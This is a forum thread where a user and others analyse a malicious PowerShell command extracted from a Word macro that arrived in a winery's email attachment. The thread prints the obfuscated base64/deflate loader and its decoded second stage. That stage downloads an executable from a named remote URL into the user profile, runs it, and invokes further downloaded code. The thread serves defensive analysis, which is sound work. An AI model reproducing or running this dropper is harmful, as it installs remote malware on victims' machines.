What does this POWERSHELL command do? (malware)

I received a Word file that is probably malware. It has a macro that runs on opening, but I disabled it. I ran the macro up to the line where it executes a Run command. The command is


What could something like that be trying to do?

The Powershell commands are encoded to obfuscate what the command is trying to do.

Here is a good overview.


This is a command to execute a base 64 encoded string as a command. The encoded command is

( .(‘nEw’+’-OB’+‘j’+‘ect’) SYSTem.io.COMPREsSiON.deflATeSTREAm([syStem.IO.MEMOrYstreAm][sYSTeM.CONVerT]::FRoMBase64strinG('TZBBT8JAFITvJv6HPdRsm8pWFCGlaYyhhGzEQgDFRE0o5bVdLd1Nd6FA0/9uTQC9vHeZmcw3Gt1TETxNkYvw8zQqXgfY0V5EIeZzV4Ns291IyEXOI5aCiT+wqR0NJiawg1rMW5H9snKJjjNsYigavH7LLwgVNpAPi9mCzGG56A0Z+DNH224m3ujx0HNxopToWtaByXUA6QpWOQtJyNeW3BfcimLOCyIS8ZC6exDynsS7FBMpUqZ0fIUNJ+I5BGGia3Qs1i2fzRHL0DnfKFW+L4/tiMcLP+WBF9G0/2e4RkdUw6ER0vWaYQCqQWsABfVZ1wQnBUn7/kAlqBEDurU7HQOV7x4L4oxLxUJJxjkPQcrPbnc6CyZKPycv65bfTlWFgQqTsqocRPtv+r9i2XAUeFOV0yzWT6M0b2zStNuk2W6Rjm3d/Q6BDcO5vPgB') ,[sYsTem.io.cOMpReSsiON.CompressIONMODE]::DECompreSS )|&('f'+'ore'+'acH'){ &('NEW-ob'+'J'+'EcT') io.STreamREADER(_,[sySTem.TExT.ENcodInG]::asCii) }|.('ForEa'+'C'+'H'){_.readtoend() } ) |.(‘I’+‘E’ + ‘X’)

It appears there is another layer of embedded base 64 string but I can’t figure this out. It is seriously obfuscated. I am guessing it is trying to send some data to somewhere, but I can’t figure out what data or where it wants to go.

That is very enlightening. This is possibly worse that I thought. I am hoping it did not run without my knowledge.

This was an attachment from a winery where I am a customer. It was sent as a reply to an email I sent them some time back. So I guess someone hacked their email account, or they possibly have a virus.

Very hard to figure out what those commands do. Takes expert level knowledge and even then probably not.

Definitely let them know they sent you a document with malware attached. They probably don’t know.

Run malware scan on your own computer to be safe.

Also, various malware prevention software would pick that up. You didn’t get any warnings?

The first thing I did was to notify them. I used the contact form on their web site, assuming the email had been hacked.

I just ran Malware Bytes and it didn’t find anything. Windows Defender virus detection had been disabled and I had to edit the registry to remove the disable. That suggests that some malware did that, but I don’t know how long it’s been like that. Defender just ran a scan and found no threats.

The code I showed in my second post is similar to the Veil Stream attack in the link you posted, but the encoded part seems to be the payload and it translated to complete nonsense.

Even the VBA code was obfuscated to an impressive degree (e.g., the encoded string was the default text of a textbox on a userform) but I am very knowledgeable about VBA and could see something nefarious was going on, and was able to extract the string I showed in my post through stepping through the debugger.

Why does Linux have to keep sounding better?



) ,[System.io.Compression.CompressionMode]::Decompress )
| take each line from that and change the encoding:

ForEach { io.StreamReader( <currentline> ,[System.Text.Encoding]::ascii) }
| take the value from that and give it to:

.ForEach {<currentline> .readtoend() } )
|take the value of that and
Decompress, change it to Ascii, Invoke Expression.

Windows Defender identified the Word file as a trojan. It was attached in an encrypted Zip file which is probably why it was not identified upon extraction from the email.


You can decode the base64 and inflate it online, without running the command:

(obviously do not copy and run this)

$IyIpaKS = 'MSfwVG';$UpwpWW=$env:userprofile+'\'+$IyIpaKS+'.exe';$o4f9Ud=.('n'+'ew-o'+'bject') Ne`T`.Web`CLieNT;$vuRDOAzC='http://zismaeldedric.com/sywo/fgoow.php?l=yeps5.gxl'.split('%');foreach($IPpm4NiW in $vuRDOAzC){try{$o4f9Ud.DowNloaDfIlE($IPpm4NiW, $UpwpWW);If ((.('Get-I'+'te'+'m') $UpwpWW).lENGth -ge 2977) {[Diagnostics.Process]::STaRt($UpwpWW);break;}}catch{}}; IEX($o4f9Ud.DownLOaDStrIng(''));

It runs some program, hits a URL, and downloads some stuff. Probably this is just the injector, and the downloaded stuff is the actual payload.

Actually, I don’t think it runs a program yet. Rather, it creates a program by downloading snippets from different sources and then combining them.

If you ran a random bash script you got in an email, it too could do the same kind of damage. It would have access to all your home folder files. Windows isn’t that different in this regard.

IMHO, if you followed the same best practices, all the major operating systems are sufficiently safe these days, though Windows remains the biggest target. None of them are invulnerable to zero-days and all of their protections can be circumvented by unwitting users. The second biggest target is in fact already Linux, via shitty Android phones and clueless users.

“Sufficiently safe” is widely optimistic. Just saw this on Slashdot yesterday.

A hole in the IP stack of VxWorks OS which runs on hundreds of millions of IoT and such devices. And since the makers of such devices quite often don’t do updates, this is a bad, bad thing.

I assume, on the other hand, that there are an unfathomable number of holes in all the common OSes several of which are currently being exploited but even those won’t be found for while, sometimes years.

Yeah, as I said, none of them are invulnerable to zero-days. IoT is especially vulnerable, but they usually don’t store particularly valuable data (yet). And then there are things like energy grids and C&C infrastructure, but those tend to attract state-sponsored opponents rather than opportunistic hackers.

For the average home user though, it’s not THAT big a deal. Just update your software regularly and run a basic firewall and ad blocker, don’t download random programs, and chances are you’ll no longer be a big target.

Thing is, a lot of our actual data is stored with third parties already, and they get hacked all the time (Target, Capital One, Equifax, etc.). And then much of the world willingly surrenders more of it to Google and Facebook, who then willingly share it through an open auction.

Ransomware may be a particular threat, but again, best practices. Back up your stuff (even just Dropbox or Google Drive), don’t run random shit, you’ll likely be fine.

Maybe I should have phrased it as such: Most consumer operating systems are sufficiently safe, if you follow best practices, given that no one individual is worth a whole lot of effort, and their data is probably easier harvested through institutional breaches anyway.

Obligatory XKCD.

In terms of “best practices”, one of the standard ones is to use a top notch ad blocker. But that’s not good for the future of the Internet. I try to be a bit lenient on blocking ads but all too often “normal” sites have skeevy ads and I have to knock that crap off.

DHS just put an advisory out about this.

So I tidy up the code, remove quote marks:

I’m guessing - not conversant with Powershell - that *$vuRDOAzC * is a list of server (IP’s?) that get downloaded from the master site.
It then uses the userenv to determine which type of software is needed (win x86 or x64?) to download the pieces of the take over program?

Something like that. The code isn’t complex, it’s just obfuscated. Basically sets a bunch of strings and concatenates them into filenames and URLs, and then downloads components.

I think it’s like…

$secret_file_path=$users_home_directory + $blah + ".exe";
$downloader = new downloader object;
$list_of_stuff = download some list and split it by % sign;

foreach ($url in $list_of_stuff)
download $url and save it to $secret_file_path;
if $secret_file_path's filesize is greater than or equal to 2977 bytes, run it;
otherwise do nothing really;

go to 3.php;

So it downloads a bunch of chunks, tests the size of each, running the downloaded app only if it’s big enough. Then it hits another random URL, maybe just to let some command center know it’s still alive.

Also keep in mind that the example in the OP is of a malicious macro in a downloaded Microsoft Word document. I’m pretty sure that the default security settings in Word for years prevents it from running macros in documents unless you specifically authorize it to.

Yes, by default. However, there is a security setting that will allow any macro to run. No idea why anyone would use that.